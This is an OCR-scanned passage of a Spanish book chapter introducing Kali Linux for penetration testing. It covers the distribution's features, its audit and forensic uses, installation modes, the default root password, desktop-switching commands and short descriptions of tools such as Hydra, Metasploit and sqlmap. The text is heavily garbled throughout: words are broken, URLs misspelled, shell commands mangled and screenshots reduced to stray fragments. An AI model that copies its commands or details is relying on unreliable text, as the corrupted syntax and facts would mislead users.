buffer,  crear  un  acceso  no  control  ado  a  alguna  direccion  de  mem  or  i  a  o  simplemente  no  debe  crear 
ni  modifiear  ningun  archive  {de  usuario  o  sistema)  si  no  esta  previamente  declarado  en  los  fines  de 
la  aplicacion,  en  case  contrario  se  considers  un  codigo  no  seguro  y  por  lo  tanto  no  es  valido  para  ser 
incluido  por  defecto  en  una  distribution  donde  lo  que  se  persigue  a  priori  es  la  seguridad, 


For  otro  lado,  tambien  sc  ban  dejado  tuera  de  Kali  Linux  algunas  aplicaciones  que  aunque 
f’aciles  de  utilizar  son  redund  antes,  y  existen  otras  herramientas  dlsponibles  que  proporcionan 
funcionalidad  parecida  o  ineluso  superior. 


eran 

una 


I  odo  esto  se  ha  realizado  con  la  unica  intencidn  de  proporcionar  a  los  usuarios  finales  una  distri buc ion 
madura  y  segura  donde  se  persigan  los  objetivos  por  los  que  fue  creado  su  predecesor. 


ln\ve  algunas  de  las  caracteristicas  que  se  podrian  mencionar  de  Kali  Linux  se  encuentran: 

Gran  soporte  para  dispositivos  inalambricos,  permitiendo  que  funcionen  correctamente  una 
arnplia  variedad  de  hardware,  como  numerosos  USB  y  otros  dispositivos  de  almacenamiento 
masivo, 

-  A  la  hora  de  desarrollar  v  construir  las  soluciones  de  cada  una  de  las  herramientas  se 
utiliza  Git  como  software  de  control  de  versiones  y  que  es  totalmente  compatible  con  el 
estandar  de  jerarquia  del  sistema  de  archives  FHS  ( Filesystem  Hierarchy  Standard). 

La  empresa  es  totalmente  partidaria  del  uso  y  desarrollo  de  codigo  abierto,  estando  el 
mencionado  codigo  (archives  binaries,  archivos  dc  soporte,  bibliotecas,  etcetera.)  disponible 
para  d  uso  y  disfrute  dc  los  usuarios  para  los  que  deseen  conocerlos*  inodifiearlos  o 
reconstruirlos  para  su  uso  o  su  posterior  distribueidn  siempre  respetando  el  esplritu  open 
source. 

El  equipo  de  desarrollo  de  Kali  es  un  grupo  reducido  de  personas  de  confianza  con  alto 
nivel  tecnico  que  interactuan  con  los  paquetes  que  coinponen  los  repositories  haciendo  uso 
dc  protocolos  seguros,  todo  ello  para  garantizar  un  entorno  de  desarrollo  fiable, 

-  Las  herramientas  pueden  ser  escritas  en  diferentes  idiomas,  no  solamente  en  ingles,  que 
es  el  idioma  en  el  que  habilualmente  son  escritas  multiples  aplicaciones.  asegurando  de  esta 
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manera  un  soporte  multilingfie  para  que  los  usuarios  puedan  operar  en  su  idioma  native  o  eti 
el  que  mis  comedos  sc  sientan  a  la  hora  do  utilizar  las  herramientas  que  deseen  y  realizar  su 
trabajo  de  la  mancra  mas  sene  ilia  y  praetica, 

-  Cade  uno  de  los  paquetes  del  reposilorio  de  Kali  son  firmados  individualmente  por  su 
desarrol lador  con  GPG  {GNU  Privacy  Guard)  aunque  la  mayoria  se  importan  sin  alterarse 
desde  los  repositories  de  Debian. 

-  El  enlorno  es  completamente  persona  I  izabie  ya  que  se  es  consciente  de  que,  aunque  el 
equipo  de  Offensive  Security  haya  oplado  por  un  diseno  neutro  o  estandar;  los  usuarios  finales 
no  siempre  estan  de  acuerdo  con  la  propuesta  y  querran  amoldarlo  a  sus  gustos  o  preferences, 
Es  dedr,  Kali  Linux  deja  abierta  la  posibiiidad  de  que  sus  usuarios  puedan  modificar  el 
aspecto  de  su  distribucion  totalmente  a  su  gusto,  desde  los  colores,  salvapantallas,  directories 
de  usuarios  y  fuentes,  hasta  dar  la  posibiiidad  a  los  usuarios  avanzados  puedan  alterar  la 
configuration  del  kernel  segun  su  propio  criterio  y  responsabilidad. 

Como  se  mencionaba  en  un  punto  anterior,  Kali  utiliza  codigo  abierto.  por  lo  tanto  es 
codigo  publico  que  cuaiquier  desarrol  lador  podria  tener  a  mano  para  realizai  los  objetivos 
que  se  proponga,  al  igua!  que  su  predecesor  BackTrack,  es  totalrnente  gratuito  y  se  manlendra 
ash  De  esta  forma  encontrarse  atgun  sitio  en  la  red  donde  se  ponga  a  la  venta  um  version  de 
Kali  Linux  que  sea  de  page,  hace  sospechar  que  se  esta  delante  de  una  persona  o  eonjunlo 
de  el  las  que  quieran  aprovecharse  de  la  popularidad  del  product o  para  obtencr  beneficios 
iliciiamenie,  Hoy  dia  no  hay  que  pagar  por  Kali  Linux,  disponi bie  en  la  web;  www.kaliorg 

Por  otro  lado  muchos  conocen  las  bondades  que ofrece  ARM  (una  familia  de  microprocesadores  con 
arquitectura  RISC-  Reduced  Instruction  Set  Computer  -  produetdos  por  la  empresa  \RM  I  foldings). 
Debido  a  su  bajo  coste  eada  vez  es  mas  frecuente  encontrarse  con  disposkivos  que  trabajen  bajo  estc 
tipo  de  arquitecturas. 


Kali,  como  no  podia  ser  de  otra  manera,  irae  soporte  para  ARM  en  sus  dos  vertientes,  ARMEL  y 
ARMHF, 


ARMEL  fue  principalniente  disenada  para  hardware  de  gama  baja,  soportando  un  conj  unto 
de  instrucciones  ARMv4  y  hardware  de  punto  fiotante  a  traves  de  un  modo  de  compatibilidad. 
Lamentablemente  disminuye  el  rendtmiento  para  poder  permitir  la  compatibilidad  eon  el 
codigo  escrito  para  procesadores  sin  unidades  de  punto  fiotante. 

-  Por  el  contrario  ARMHF  fue  concebido  para  el  hardware  de  gama  alia  y  es  compatible 
con  ARMv7ff  por  io  eual  es  mas  rapido  y  tiene  apoyo  di recto  de  hardware  de  punto  fiotante  sin 
compatibilidad  haeia  aims.  Este  modelo  ser ia  el  mas  similar  a  las  arquitecturas  i386  y  i686. 


Kali  Linux  esti  actualmente  disponible  para  los  siguientes  dispositivos  ARM: 


*  Raspberry  Pi 

-  rk33Q6  mk/ss808 

-  ODROID  U2/X2 
Samsung  Chrome  hook 
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Los  repositories  de  las  herramientas  para  ARM  seran  actualize  das  a  fa  par  que  el  resto  de  la 
distribucion. 


Obviamente  Kali  Linux  es  una  nueva  distribution  y  tiene  unas  claras  diferencias  con  la  disLrihucion 
Dehum  en  la  que  esta  basada.  Bntre  dichas  diferencias  se  cncuentran: 


-  Es  neeesario  loner  un  kernel  modificado,  actualizado  y  optimizado  (pareheado}  para 
realizar  el  proceso de pettiest  mg a  la  red  Wireless ,  yaque  se  realizaran  auditor ias  de  seguridad. 

-  Kali  Linux  ha  sido  disenado  para  que  predetenninadameme  exista  solo  un  tipo  se  usuario, 
el  superusuario  o  roof . 

-  En  Kali  Linux  existen  hooks  sysvimt  que  por  seguridad  deshabiiitan  los  servicios  de  red 
por  defecto, 


4.  Vision  global  en  Kali  del  pentesting 

Al  principio  BackTrack  fue  coneebido  y  desarrollado  como  una  recop  i  lac  ion  de  herramientas  para 
uso  personal  por  parte  de  Offensive  Security  para  la  realizacion  de  tareas  de  analisis  forenses  y 
auditorias  inform  aticas,  sin  embargo,  al  pasar  los  aiios  su  popularidad  ha  crecido  hasta  Hmites 
insospechados,  ya  que  hoy  en  dia  hablar  de  pen  testing  sin  que  aparezea  La  palabra  BackTrack  es 
inusual  sin  Uegar  a  la  exageraclon  de  dedr  que  es  practicamente  imposible.  Aunquc  siempre  habra 
quienes  piensen  que  si  no  exisiiera  dicha  distribut  ion  de  jgual  manera  se  podrian  realizar  las  labores 
de  miditoria  y  que  no  es  indispensable,  pero  no  podran  uegar  que  con  dla  todo  se  simpiifiea  mucho, 
sobre  todo  cuando  la  send  lie/  de  tener  todas  las  herramientas  a  mano  supone  ahorrar  mucho  tiempo 
de  trabajo  y  por  to  tanto  dinero. 


Despues  de  todo  lo  comentado  anteriormente,  en  miichas  conversaciones  de  profeskmales  dc  la 
inform atica  empezara  a  sonar  la  palabra  y  muchos  usuarios  dc  diferentes  sistemas  operatives 
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se  interesaran  en  61,  tras  lo  cuai  surge  una  buena  pregunta:  <\Es  “Kair  una  distribucion  adecuada 
para  cualquicr  persona? 

Kali  Linux  ha  sido  desarrollada  (y  sigue  desarrollandose)  especi  flea  men  te  para  !a  realization  de 
test  de  intrusion,  pur  3o  tanto  para  desenvolverse  a  la  perfection  en  el  entorno  hate  (alia,  en  primer 
lu gar.  conocer  previamunte  el  firneionamiento  dd  sistema  operative  Linux,  de  lo  eual  hay  eantidades 
ingentes  de  documented  on  cn  la  red,  en  caso  contrario  seria  buena  idea  abstenerse  de  iniciarse 
en  Kali  ya  que  no  es  recomen  dado  para  print  ipiantes  Linux  debido  a  que  eslos  usuarios  son  mas 
propensos  a  cometer  errores  con  el  uso  de  la  euenia  del  supemsuario  o  root,  i  hidiendo  causar  daiios 
irreparables  y  deseneadenar  fallos  significativos  en  el  sistema.  (En  la  web  oficial  de  Kali  Linux  esta 
toda  la  documentation  al  respeeto). 

Despues  conviene  recordar  que  la  distribucion  esta  orientada  especfficamente  a  las  pruebas  de 
intrusion  de  caracter  profesional  y  auditorias  infonnaticas  en  el  piano  de  la  seguridad,  por  lo  tanto 
no  es  una  distribucion  recomendada  para  cualquier  usuario  ajeno  a  este  circulo. 


Kali  en  el  entorno  de  una  auditorla  interna 

El  entorno  privado  de  una  empresa  u  organizacion  puede  ser  un  esquema  complejo  y  foco  de 
vulnerabilidades  que  aunque  no  se  ven,  exisien,  Por  elio  y  debido  a  ta  importance  de  eviter  la  fuga 
o  robo  de  informacidn  confidential  de  la  empresa,  es  vita!  apoyarse  en  una  auditorla  interna  que 
|  verlfique  el  estado  de  la  seguridad  de  la  organizacion. 

La  auditon a  de  seguridad  interna  o  auditoria  de  caja  blanea  asume  el  rol  de  un  usuario  que  dispone 
de  acceso  a  los  sistemas  internes  de  la  empresa  o  desde  un  sistema  coneetado  a  dieha  red,  bien 
porque  sea  el  duetto  de  las  credenciales  o  porque  mediante  un  ataque  ha  clevado  privilegios  de  forma 
illcita. 

Con  el  uso  de  las  herramientas  que  proporciona  Kali  Linux  se  imenta  de  tec  ter  y  mitigar  el  maximo 
de  vulnerabilidades  en  servidores  internos.  comunicaciones  no  seguras  en  la  red  eorporativa, 
malas  configuraciones,  sistemas  desactualizados,  redes  Wireless  no  seguras.  etcetera,  En  defimtiva 
potenciales  vectores  de  ataque  que  puedan  provocar  robo  de  informacion  sensible  en  una  empresa. 


Kali  en  el  entorno  de  una  auditorla  externa 

Las  empresas  en  la  actualidad  poseen  gran  caniidad  de  servieios  pubtieos  los  euales  pueden  ser  una 
pasarela  haeia  informacion  o  daios  sensibles  de  estas. 

La  auditoria  de  seguridad  externa  o  auditorla  de  caja  negra  asume  el  rol  de  un  atacante  extemo  a 
la  empresa  o  hacker  que  sin  cl  conocimiento  de  ninguna  informacion  previa  puede  obtener  algun 
beneticio  de  la  organizacion  o,  incluso,  acceso  a  informacidn  sensible  que  comprometa  la  privacidad 
de  la  empresa,  poniendo  a  prueba  el  estado  de  las  barreras  de  seguridad  que  dispone  la  empresa  cnire 
internet  y  su  red  corporativa. 


26 


Pentesting  con  Kali 


Este  tipo  dc  auditoria  pretende  valorar  el  grado  dc  seguridad  de  la  red  externa  de  una  empresa  y 
mediante  la  simulacion  de  un  ataque  cxtemo  se  evalua  la  misma.  Sc  pretende  descubrir  el  mayor 
numero  dc  vulnerabilidades  en  los  servicios  publicos  y  fallos  de  seguridad,  que  pueden  scr  ei 
resultado  dc  una  mala  configuraeion,  que  existcn  en  dichos  servicios,  (Mro  dc  bs  grandcs  objetivos 
de  la  auditoria  externa  es  aumentar  la  seguridad  mediante  la  presentacion  de  planes  de  mejora  que 
deben  ser  implantados  en  la  empresa. 

Kali  Linux  posee  un  complete  abanico  de  posibilidades  para  afrontar  este  tipo  de  auditorias, 
y  tambien  pmporciona  herramientas  para  realgar  informes  completos  de  las  actividades  que  se 
realizar  para  completar  esias  pruebas. 


Kali  en  el  entorno  de  una  auditoria  web 


A  dia  de  hoy.  la  gran  mayor ia  de  las  aplicaciones  y  servicios  web  son  potencialmente  susceptibies 
a  un  conjunto  de  ataques  independientes  de  la  platafonna  o  tecnologia  utilizada  y  normal  men  le 
tienen  su  origen  en  defectos  en  el  diseno  e  imptementacion  de  las  aplicaciones,  en  la  programacion 
descuidada  de  las  runny  s,  en  la  pohre  implementacion  de  medidas  de  control  dc  aeceso  o  en  la  lalta 
de  validation  y  saneamiento  de  los  dates  de  entrada.  Este  hpo  de  ataques  a  aplicaciones  web  pueden 
suponer  grandes  perdidas  economicas  sobre  la  empresa  afectada,  lo  que  posiblemente  desembaque 
en  una  mala  imagen  tiacia  nuevos  clientes  o  asociados, 


Imaged  01,04:  Audilorfu  de  Scgtmdad  Web. 


Mediante  el  uso  de  las  aplicaciones  preinstaladas  en  Kali  Linux  y  las  disponiblos  cn  los  repositories 
oliciales,  se  pueden  identificar  que  vulnerabilidades  contiene  la  apltcftcidn,  aunque  nunca  se  puede 
dejar  de  lado  la  habilidad  del  auditor,  quien  hactendo  uso  de  las  tecnicas,  automatizadas  y  manuales 
mas  novedosos.  lograra  completar  cl  objetivo  de  manera  satisfactoria.  completando  cada  etapa  de 
evaluacion  con  el  sistema  de  informes  incluidos  en  csta  distribution. 


Capita  !o  I,  Pen  testing 


11 


Kali  en  el  entorno  de  un  analisis  forense 

Un  analisis  forense  de  sistemas  operatives  eonsiste  en  la  recuperaci6n  y  tratamiento  de  information 
despues  de  que  oeurra  algun  tipo  de  me  ideate,  donde  no  solamente  hay  que  ser  canto  a  ia  bora  de 
recoger  informacion  sino  que  tambifin  es  import  ante  saber  que  datos  o  pruebas  pueden  resultar  mas 
relevantes  al  realizar  una  investigacidn*  Se  ha  de  tener  en  cuenta  que  debe  actuarse  con  la  mayor 
agilidad  posible,  de  eara  a  un  potential  problema  en  el  sistema  operative)  que  corrompa  pruebas,  un 
tallo  electrico  o  cualquier  causa  que  pueda  propieiar  una  perdida  de  evidencias. 


Llut:  (bflfi  ptt*r  failsafe) 
live  (forensic  mu<le) 
Inst a  I ) 


Graphical  install 
Aduunnert  options 


Press  EMTER  to  toot  or  TAB  to  edit  a  menu  entry 


Imager  0LG5:  Selection  de  Kali  Lima  en  Mu  do  Forense. 


Ya  desde  su  antecesor,  BackTrack  Linux,  se  introdujo  el  “Mode  Forense  prevaleciendo  hasta  la 
actual  i  dad  en  Kali  Linux,  re  sultan  do  una  herramienta  muy  util  cuando  se  necesita  hacer  un  trabajo 
utilizando  codigo  abierto  forense, 

Dada  la  importaneia  de  no  corromper  las  evidencias  o  el  entorno  cn  el  cual  ha  ocurrido  el  incidente 
informatico,  es  necesario  que  el  “modo  forense"  presente  algunos  cambios  en  relacion  al  "modo 
normal’*,  entre  los  que  se  pueden  mencionar: 

III  soporte  automat ico  para  cualquier  medio  externo  ha  side  desactivado,  por  !o  que 
memorias  flash,  USB,  unidades  de  CD,  unidades  de  almacenamiento  cxtraible,  etcetera,  no 
sarin  mantados  automaticamente  al  ser  insertados  en  el  equipo,  de  forma  que  se  mantiene  el 
control  complete  por  parte  del  usuario,  siendo  fete  el  unico  responsable 

-  En  primer  Sugar,  no  se  montara  automaticamente  n i  sc  hara  uso  de  n ingun  disco  duro 
intcnio  (incluyendo  particiones  de  intercambio)  para  evitar  contaminarlos,  Pueden  utilizarse 
las  herramientas  de  analisis  forense  que  iiicluye  Kali  Linux  en  modo  forense  sin  temor  a 
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pcrturbar  el  emorno.  El  equipo  de  Offensive  Security  ha  realizado  una  comprobacion 
toman  do  un  hash  un  disco  dtiro  antes  y  despuis  del  uso  de  Kali  Linux  en  modo  forense,  y  ha 

coni  probado  que  am  bos  hashes  coincides  verificando  quo  cl  disco  dum  no  ha  sufrido  la  inis 
minima  variation. 


S.Modos  de  trabajo  de  Kali 

En  Kali  Linux  existen  diferemes  modes  de  trabajo  a  traves  de  los  cuales  es  posible  compietar  las 
labores  profesionales  eon  el  unieo  objetivo  de  mirtimizar  tiempo  y  esfuerzo,  tlegando  a  obtener  los 
resnltados  deseados. 


Para  realizar  todo  esto  previamente  se  debe  acudir  a  la  pagina  oficial  o  a  algimo  de  sus  distribuidores 
oficiales  y  obtener  la  ultima  version  de  Kali  Linux. 


b»o  msm 


Pl.OG  DOWN  I  OAO'S 


Downloads 


UtJWNLOAD  VQUfl  FLAVOUR  OF  KALI  I  IN U K 


Register  anrj  slay  up  lo  date  wiin  kali 

Ywir  name 

li 

’(M  email 

\  _  . 

Re^gler  A  Qsmntodd 


No  tflanKs  jj si  went  !c  downi&3dr 

Registration  is  not  raquireo  jr  order  tc  download  KLgti  LJnut  Howewer  it  r&u  wool 6  |ite  t& 
slat  up  lq  dale  witft  (tie  latest  news  and  Kail  Lima,  updates,  you  are  invited  In  register 
wrtfr  HE  We  send  only  few  emails  a  ye  hi.  and  wit  never  wiillrgi>  sfisre  our  mailing  list 
with  anyone,  ever 


Imagen  01.06:  Pe tic  ion  de  email  y  nomhre  para  acceder a  la  dcscarga, 


lin  esta  inaagen  se  puede  ver  quo  se  hace  el  pedido  de  un  email  y  un  nomhre  para  acceder  a  la 
dcscarga  del  producto,  sin  embargo  no  es  imprescindible  realizar  esto,  ya  que  si  se  hace  clic  sobre 
la  opcidn  “Vo  thanks,  just  want  to  download',  se  accedera  ai  formulario  de  descarga  directamente. 


Una  vez  pasada  la  mencionada  pantalla.  se  procedera  a  definir  el  tipo  de  distribueion  Kali  Linux  que 
se  desea  descargar. 
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1  ilia  gen  01.07:  Formulario  dt*  descarga  de  Kali. 

Iras  conseguir  descargar  Kali,  se  podria  hacer  una  primera  toina  de  contacto  con  ei  entorno. 

Boot  menu 

Li ue  <6Bb-pae) 

Live  <606 - par  failsafe) 

Live  < forensic  mode) 

Inst a  1 1 

Graphical  install 

advanced  options  > 

.  linux  /]  ivc^umliiiux:  hoot=live  noconf iy=sudo  user  name -root  hostname  Kali  Ini 

trd ~/\  iue^iroi  trd  .  img_ 

Imagen  01.08:  Menu  configurable  de  iuicio  Kali. 

Entre  los  modos  de  uso  se  encuentran: 


Live-CD 

Este  es  un  modo  habitual  en  las  distribuciones  de  Lima  donde  se  busca  hacer  uso  de  la  distrihucidn 
sin  necesidad  de  tenerla  instalada  fisicamente  en  la  maquina,  solamente  arrancandola  desde  la 
unidad  de  cd,  lo  cual  es  muy  benefieioso  en  tiempo  si  solamente  se  requiere  utilizar  una  o  algunas 
de  las  herramientas  incluidas  en  el  sistema  operative,  o  si  simpleinente  se  quiere  hacer  una  primera 
toma  de  contacto  con  dicha  distribucion, 

Como  se  comentaba  anterionnente,  Kali  Lima  esia  disefiado  para  que  sea  usado  por  un  usuario  root 
por  defect  o,  sin  embargo,  <;Cu4l  es  la  contrasefia  de  roof!  La  respuesta  es  sene  ilia  y  viene  heredada 
de  sistemas  BackTrack,  donde  de  forma  predeterminada  la  contrasefla  para  el  usuario  root  era  el 
mismo  nombre  "root”  pero  en  orden  inverse,  es  decir  "toof  \ 

Desde  !a  opcidn  Live  CD  se  puede  hacer  uso  de  todas  las  herramientas  incluidas,  sin  embargo  los 
cambios  que  sc  realicen  a  documentos  no  sc  podran  mantener  de  manera  automitica  en  la  maquina 
una  vez  que  ftnalice  la  sesion. 
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Instalacion  en  fisico 

Para  iniciar  una  instalacion  en  fisico  hace  falta  obtener  un  archive  iso  de  Kali  Linux \  disponible 
desde  la  web  oficial  www.kati.ot-g  o  desde  alguno  de  sus  asociados, 

Imcialmente  la  version  I  0J  tenia  un  tamafio  de  2.1  GigaBytes,  sin  embargo,  como  m  comentaba 
tambien,  Kali  esta  en  constante  earnbio  por  lo  que  rapid  am  cute  ha  evolucionado  a  la  version  1 .0.2 
donde  ademas  de  crecer  t^cn teamen te  tambien  lo  ha  hecho  en  tamafio  de  fiehero,  pasando  a  nonpar 
2.3GB. 

A1  realizar  la  instalacion  aunque  podrian  aparecer  algunas  advertencias  a  la  hora  de  cargar  drivers  y 
components,  detectar  hardware  y  configurer  la  red,  suele  llegar  al  final  sin  ningun  tipo  de  problemas, 
En  el  camino  do  instalacion  basta  con  elegir  idioma,  ubicacion,  lipo  dc  teclado,  y  a!  contrario  de 
BackTrack  se  designa  tambien  la  clave  de  root  en  la  instalacion.  Sc  puede  incluir  el  equipo  en  d 
dominio  si  se  desea,  o  inventarse  uno  si  se  encuentra  en  una  red  domestica.  En  portables  se  ofrece  la 
posibilidad  de  replicar  la  inter faz  de  red,  para  di versos  usos  ( WLAN y  Ethernet). 

Una  de  las  oportimidades  que  ofrece  el  uso  de  Kali  Iras  una  instalacion  en  medio  fisico  o  maquina 
virtual  es  la  posibilidad  do  cambiar  el  escritorio  segun  los  propios  gustos  del  usuario. 


Cambiando  el  eacritorio  de  Kali 

Kali  Linux  uU\i/:&  Gnome  por  defecto,  sin  embargo  no  todos  los  usuarios  son  partidnnos  de  usarlo, 
por  lo  que  se  ha  dejado  abierta  la  posibilidad  para  que  a  traves  de  unas  fficiles  modtficaciones  se 
pueda  pasar  al  sistema  que  mejor  se  adaple  a  los  gustos,  Solo  es  necesario  oditar  3  a  ultima  seed  on 
de  conjig/ package -i ists/kall / is t chroo i  que  contiene  las  entradas  relacionas  con  el  ambiente  de 
escritorio  que  haya  elegido  el  usuario.  La  section  comicnza  con  ei  siguiento  comentario; 

#  Graph i cal  des k tops  dep en dj ng  on  the  architecture 

#  You  can  replace  all  the  remaining'  lines  with  a  list  of  the 

#  packages  required  to  install  your  preferred  graphical  desktop 

#  or  you  can  just  comment  everything  except  the  packages  of  your 

#  preferred  desktop * 

Para  eartibiarlo  por  un  entorno  KDE 

kali-defaults 
kali-root- 1  ogi  n 
desktop-base 
ktie -plasma ^desktop 

GNOME 

gnome *core 
kali "defaults 
kal i -root -login 
desk top "base 

LXDE 

kali- defaults 
kali- root -log in 
desktop-base 
Ixde 
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XFCE 

kal i -defaults 
kali-root-1 ogi n 
desktop-base 
xfce4 

13WM 

I  c beers  to  Oxerror 
xorg 
dmenu 
oonky 
IN¬ 
MATE 

El  escriiono  “MATE”  no  esta  incluido  por  defeeto  en  los  repositories  de  Kali  Linux*  >  requierc  de 
algunos  pasos  adicionales  para  ser  integrado. 

echo  "deb  http :  / /repo .mate-desktop , org/ debian  wheezy  main'1'  »  / etc/ apt/ sources . 

1  i  st 

apt-- get  update 

apt.- get  install  mare- arch  i  ve-  key  ring 

Despues  se  contimia  con; 

I  apt-get  install  git  live-build  cdebootstrap 
I?  git  clone  git : //git .  kali  ,  org/live-bui  id-config*  git 
cd  1  ive-bui  1  d- config 
mkdi  r  config /archives 

echo  "deb  http: //repo .mate-desktop . org/debian  wheezy  main"  >  config /archives /mate, 
list .binary 

echo  "deb  http://repo.mate-dosktop.org/debian  wheezy  main"  >  config /archives /mate, 
list, chroot 

cp  /up.  r/  share/  keyrings /mate-  archive  -key  ring  ,  gpg  con  fig  /archives /mate  .  key  .binary 
Cp  /  us r/ pha re/ keyrings/mate-aichive- keyring ,  gpg  config/ a  rchives/mate .key . chroot 
echo  "sleep  2  0"  >>  config  /hooks/  z  _  sleep  ,  chroot 

Por  ultimo  agrega  el  escritorio  mate  a  la  lista  de  paquetes: 

na.no  config/package-lists/kali  .list,  chroot 

Despues  de  editarlo,  este  deberia  quedar  de  esta  nianera: 

xorg 

tna  t  e  -  a  t;  chive  -  key  r  in  g 
mate -core 

mate-desk top-e n  v i ronme n t 

Instalacion  en  VM 

Desde  la  web  ulieiul  tambien  se  puede  descargar  un  Ikhem  comprinmlo  de  3  UB  de  tumann  (“kali* 
linuK-1.0-i386-gm>me-vm”),  cl  cua!  una  vez  descomprimido  oeupa  7.60  GB,  y  eontiene  uu  disco 
duru  virtual  que  reserva  espacio  din^micamente  hasta  un  maximo  de  30  GB  donde  se  encuentra 
instalado  Kali. 
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imagen  01*09:  Fichcros  que  componen  ul  disco  duro  virtual  comprimido. 


Cuando  se  dice  que  el  disco  reserva  espacio  dinteiicamente  quiere  deeir  que  mientras  mas  espacio 
ocupe  en  el  disco  virtual,  mas  espaeioocuparaen  el  disco  real,  sin  embargo  tiene  el  gran  inconvenient 
de  que  cuando  se  libere  el  espacio  del  disco  virtual,  ya  no  se  recup  era  el  cspacio  en  el  disco  real. 


Is1  .Crime ’rt*;  OliCW'.V-M  V  'tuftiBatr; 


t  m 


M^n  Afrr  i  JJl  AM 


Imagen  01. .10:  Kali  Linux  corriendo  en  una  m^quina  virtual 
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Al  igual  que  sucede  en  el  mode  Live  CD  el  usuario  predeierminado  es  root  y  la  eontrasena  para 
aeceder  es  toor. 


Paseo  por  Kali 

Unas  de  las  caraetenstieas  esenciales  y  algo  que  se  veria  a  simple  vista  a  la  hora  de  realizar  un 
primer  uso  de  la  mieva  distribucidn  es  la  existeneia  del  “ Top  1 0  Security  Tools  \  una  lista  con  las  1 0 
herramientas  mas  utilizadas,  con  mayor  demands  y  utilidad  del  mere  ado,  En  posteriores  capitulos 
de  hara  un  analysis  mas  complete  de  la  mayoria  de  estas  aplicaciones. 


Applications  PUn  - 

7  EJ 

f  Accessories 

J 

Electronics 

> 

jjj-  Graphics 

> 

^  internet 

> 

kali  Linux 

> 

kA  Office 

> 

^  Programming 

> 

||1  Sound  &  Video 

> 

System  Tools 

> 

Top  10  .  s-curit  /  Toots 


Web  Applications 


g  Wireless  A  tucks 
O  Exploration  Tools 
(Si  S  niffi  n  g/Spoof  i  n  g 
Maintaining  Access 
Reverse  Engineering 
V  Stress  Testing 
Q  Hardware  Hacking 
^  Forensics 
[JS  Reporting  Tools 
tT  System  Services 


%  arc  rack-ng 

burpsuttc 

>  ^john 

maltego 

>  metasploit  framework 
nmap 

>  sqLmap 
wireshark 

\zapro*y 


HD  R 


Imagen  01,1  i:  Aplicaciones  que  conformaji  el  Top  JO  Security  JboJs 


Kira  cl  Id  Offensive  Security  ha  realizado  diferentes  estudios  basado  en  estadisticas  de  uso,  encuestas 
de  populari  dad  y  result  ados  basados  en  su  amplia  experiencia  en  el  mundo  de  la  seguridad 
inlbrinatica,  siendo  la  lista  de  herramientas  las  siguientes: 

*  Aircrack-ng:  Se  trata  de  un  conjunto  de  software  de  seguridad  inalainbrica  que  incluye 
un  analizador  de  paquetes  de  redes,  un  crackeador  de  redes  WEP  y  WPA/WPA2-PSK  y  otro 
conjunto  de  herramientas  de  auditoria  inatambrica. 
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•  Burp  Suite :  Es  una  herramienta  escrita  integramente  en  Jaw  que  permite  realizar  test  de 
intrusion  en  aplicaciones  web,  permit  iendo  combinar  tecnicas  manuales  y  auto  mil  ieas  para 
anatizar,  deteetar,  atacar  y  explolar  aplicaciones  web. 

fncluye  dementos  tales  como  un  Spider  web,  un  Intruder ,  un  repetidor  de  Hamad  as,  con  lo  que 
las  peticiones  puedeit  ser  automat  izadas* 

*  Hydra:  Es  un  crackeador  de  contraseftas  multihilo  por  fuerza  bruta  en  base  a  diccionartos. 
Puede  craekear  practieamente  eualquier  servicio  {Telnet,  POP3,  SMTP,  IMAP,  SMB,  SSH  VI  y 
2,  etcetera)  usando  una  conexion  directa  o proxys,  eon  o  sin  SSL. 

Esta  herramienta  ha  obtenido  una  gran  reputacidn  gracias  a  poder  ser  ejccutada  desde  consola 
tanto  en  sistemas  Linux  como  Windows 


*  John:  Hace  referenda,  como  no,  a  John  The  Ripper ,  una  herramienta  muy  popular,  va  que 
permite  comprobar  que  las  contrasenas  de  I  os  usuarios  son  lo  suficientemente  seguras, 

Apliea  fuerza  bruta  para  descifrar  contraseftas,  siendo  capaz  de  romper  varies  algoritmos  de 
eifrado  o  hash,  como  DES,  SHA-1  entre  otros. 


*  Mai f ego:  es  una  aplicacion  de  mineria  y  recoleccion  de  informacion  utilized  a  durante  la  fase 
de  Data  Gathering,  proceso  en  el  cual  sc  iraia  de  obtener  el  mayor nuraero  de  informacion  posible 
sobre  un  objetivo  para  su  posterior  ataque.  La  informacion  la  obtiene  de  Internet  y  la  representa 
de  forma  grafica  para  que  sea  mds  scncillo  de  analizar  Es  una  herramienta  muy  potente,  llena 
de  opciones  que  pueden  ser  muy  utiles  para  investigar  empresas,  sitios,  personas  y  mucho  mas. 


Permite  iniciar  btisquedas  a  part i r  do 
telefonos  e  incluso  frases, 


dominies,  IPs,  ufeicaciones  geograficas,  coireos,  nombres, 


En  esta  edicion  Maitego  ha  modificado  su  imagen  de  inicio  adaptandola  a  la  nueva  distribution. 
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1  ma  gun  01.12:  In  ieiand  o  Ua  It  ego  para  Kai i  L  inux . 
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*  Me  tax  plait:  una  forma  sencilla  de  delinir  Me  tax  plait  Framework  es  que  se  trata  de  una 
herramienta  para  desarrollar  y  ejecutar  exploits  contra  un  equipo  remote.  Sin  embargo  esta 
herramienta  dispone  de  grari  cantidad  de  iimcionalidades  las  euales  son  may  imli/adas  en  el  dia 
a  dia  por  Eos  audi tores  de  seguridad  para  llevar  a  cabo  sus  test  de  intrusion,  pudiendo  realizar  con 
Meiasploit  Framework  no  solamente  la  explotacion  y  post  explotacidn  del  si  sterna,  sino  tambien 
los  pasos  preyios  a  ellus  vistos  a!  inieio  del  capita  lo. 


*  Nmap :  Es  un  programs  por  consola  de  comandos  que  sirve  para  efectuar  rastreo  de  puertos 
y  se  usa  para  evaluar  la  seguridad  de  sistemas  mformaticos,  asi  como  para  desetibrir  servicios  o 
servidores  en  una  red  informatics.  Entre  las  diferentes  utilidades  que  se  le  da  a  esta  herramienta 
de  encuentran: 


-  Identifies  puertos  abiertos  en  una  cornputadora  objetivo. 

-  Determina  que  servicios  esta  ejecutando  la  misma. 

-  Obtiene  algunas  caracteristicas  del  hardware  de  red  de  la  maquina  testeada. 

-  Contribuye  a  realizar  la  labor  tit  fingerprinting  determ  i  nan  do  que  si  sterna  operative  y  3  a 
version  que  utiliza  die  ho  ordenador 

Identifies  equipos  en  una  red. 


*  Sqlmap:  Es  una  herramienta  muy  util  en  los  test  de  intrusion  que  automatiza  el  proceso  de 
detec  cion  y  explotacion  dc  tallos  detipo  SQL  Injection  y  de  esta  forma  obtenertoda  la  inform  aci6n 
contenida  dentro  de  los  servidores  de  bases  de  dates.  Entre  las  caracteristicas  resenables  de  esta 
herramienta  se  encuentran: 


